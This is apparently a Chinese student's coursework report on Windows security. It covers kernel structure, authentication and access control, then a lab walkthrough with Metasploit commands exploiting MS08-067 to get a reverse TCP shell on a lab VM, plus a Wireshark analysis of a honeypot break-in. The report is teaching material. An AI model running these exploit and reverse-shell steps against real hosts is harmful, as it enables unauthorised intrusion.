20199130 2019-2020-2 《网络攻防实践》第7次作业

20199130 2019-2020-2 《网络攻防实践》第7次作业

本次作业属于哪个课程	《网络攻防实践》
这个作业要求在哪里	《Windows操作系统安全攻防》
作业正文	下述正文

1. Windows操作系统的基本结构

Windows与包括UNIX在内的现有大多数商业操作系统一样，采用宏内核模式进行架构，即大量的内核模块与设备驱动程序共享内核态内存空间。这种宏内核机制也使得Windows操作系统容易遭受以驱动方式植入内核的Rootkit的危害，为避免这类攻击最新的Windows7要求所有请求安装进入内核执行的设备驱动该程序都需要经过数字签名。

2. Windows操作系统内核基本模块

• Windows执行体、 Windows内核体、 设备驱动程序、 硬件抽象层、Windows窗口与图形界面接口内核实现代码、 系统支持进程、 环境子系统服务进程、 服务进程、用户应用软件、 核心子系统DLL
• Windows操作系统内核中实现的核心机制：Windows进程和线程管理机制、 Windows内存管理机制、 Windows文件管理机制、 Windows注册表管理机制、 Windows的网络机制

3. Windows身份认证机制

（1）对于每个安全主体，以时间和空间上都有全局唯一的SID安全标识符来进行标识
（2）windows为每个用户和计算机设置账户accounts进行管理，并引入用户账户容器来简化用户管理
（3）windows的用户账户的口令字经过加密处理之后被保存于SAM或者活动目录AD中
（4）Windows支持本地身份认证和网络身份认证两种方式，分别对在本地系统登录和远程网络访问的主体进行合法性验证
（5）Winlogon进程、GINA图形化登录窗口、LSASS服务通过协作来完成本地身份认证的过程。

4. Windows授权与访问控制机制

- 基于引用监控器模型，由内核中的SRM模块与用户态的LSASS服务共同来实施。SRM作为中介，根据设定的访问控制列表进行授权访问。
- 用户等主体经过认证后，会被赋予一个访问令牌，保存了SID标识符列表。

windows下所有需要保护的内容都被抽象成对象，每个对象会关联一个SD安全描述符。主要属性如下：

• Owner SID：对象所有者的SID
• Group SID：对象所在组的SID
• DACL自主访问控制列表：指明了哪些安全主体可以以何种方式访问该对象
• SACL系统审计访问控制列表：指明了哪些主体发起的哪些访问需要被审计

5.动手实践：

实践一：Merasploit Windows Attack
任务：使用Metasploit软件进行Windows远程渗透攻击实验
具体任务内容：使用Windows Attack/BT4攻击机尝试对Windows Metasploit靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机访问权。

• 将win2kserver（IP地址为192.168.200.124）作为Windows靶机，kali（IP地址为192.168.200.3）作为攻击机。

• 首先在kali终端提权后输入msfconsole：
  

• 接着输入命令search ms08_067打开漏洞：
  

• 输入命令use exploit/windows/sun/ms08_067：
  

• 输入命令show payloads查看载荷：
  

• 接下来输入命令 set PAYLOAD windows/meterpreter/reverse_tcp,设置有效攻击载荷：
  

• 输入show options 查看攻击数据，可以看见PHOSTS靶机和LHOST攻击机，如下图所标记的位置：
  

• 接下来分别设置靶机和攻击机的IP地址： set PHOSTS “192.168.200.124” 和 set LHOST “192.168.200.3”，之后输入命令show options 查看数据。如下图，已经将其设置完毕：
  
  

• 使用exploit对载荷进行渗透攻击：
  
  emmm不知道为什么使用set payload windows/meterpreter reverse_tcp 载荷并不能渗透攻击成功

• 在前面步骤中添加命令 set PAYLOAD 3（即set payload generic/shell_reverse_tcp）设置攻击的载荷为tcp反向连接：
  

• 之后再exploit对载荷进行渗透攻击：
  

• 验证：在靶机中输入ipconfig命令，可知实验已经成功
  

实践二：解码一次成功的NT系统破解攻击
来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
1）攻击者使用了什么破解工具进行攻击
2）攻击者如何使用这个破解工具进入并控制了系统
3）攻击者获得系统访问权限后做了什么
4）我们如何防止这样的攻击
5）你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

（1）攻击者使用了什么破解工具进行攻击

• 将云班课的.log文件下载到kali桌面并用wireshark打开，先使用命令 ip.src213.116.251.162 && ip.dst172.16.2.106 进行筛选。可以发现攻击者一开始进行的HTTP访问，对其进行TCP数据流跟踪发现http请求的主机系统为NT5.0 以及响应HTTP请求的主机安装了IIS/4.0服务组件

• 发现报文：Get请求后有启动文件boot.ini,发现【%C0%AF】为Unicode编码，所以判断攻击者进行了Unicode攻击。

• 继续往下有msadcs.dll数据包，由AFDM！ROX！YOUR！WORLD！得知是msadc.pl/msadc2.pl渗透脚本工具，并在msadc.dll存在的MDAC RDS漏洞处进行了SQL注入

（2）攻击者如何使用这个破解工具进入并控制了系统

• 在wireshark中输入ip.rsc == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST"进行筛选，并追踪其TCP数据流

• 在299号数据包追踪TCP数据流，由图示中Login incorrect 发现攻击者连接至FTP服务器但并未成功

• 在1106号数据包FTP成功

• 打开1224号数据包对其进行TCP数据流跟踪，发现攻击者连接了6969端口并得到了访问权限

（3）攻击者获得系统访问权限后做了什么

• 输入tcp.port== 6969,追踪其TCP数据流

• 攻击者尝试进入但失败了并同时列出了用户

• 发了echo消息给c盘根目录文件：README.NOW.Hax0r ，并且删除了很多文件

• 使用fdisk尝试获得SAM文件，rdisk：磁盘修复文件，fdisk/s-:备份关键信息。攻击者将/repair目录中创建的sam._的SAM压缩拷贝到har.txt文件中

• 最后退出

（4）我们如何防止这样的攻击

• 升级系统到最新版本；禁止使用RDS等服务

（5）你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

• 打开4351号数据包，攻击者写了这是他见过最好的蜜罐：发现其目标为一台蜜罐主机

实践三、团队对抗实践：windows系统远程渗透攻击与分析
攻击对抗实践内容：攻击方Metasploit windows Attack，防御方：wireshark捕获攻击流，分析出攻击那个安全漏洞

• 重复实践一，在exploit之前打开wireshark进行捕获监听，之后exploit进行攻击。可以看到攻击机、靶机等相关信息

6.遇到问题及解决方法

（1）使用set payload windows/meterpreter reverse_tcp 载荷并不能渗透攻击成功

• 解决方法：设置set payload generic/shell_reverse_tcp即可

7.心得体会

操作问题不大，分析能力比较差，希望能够提高。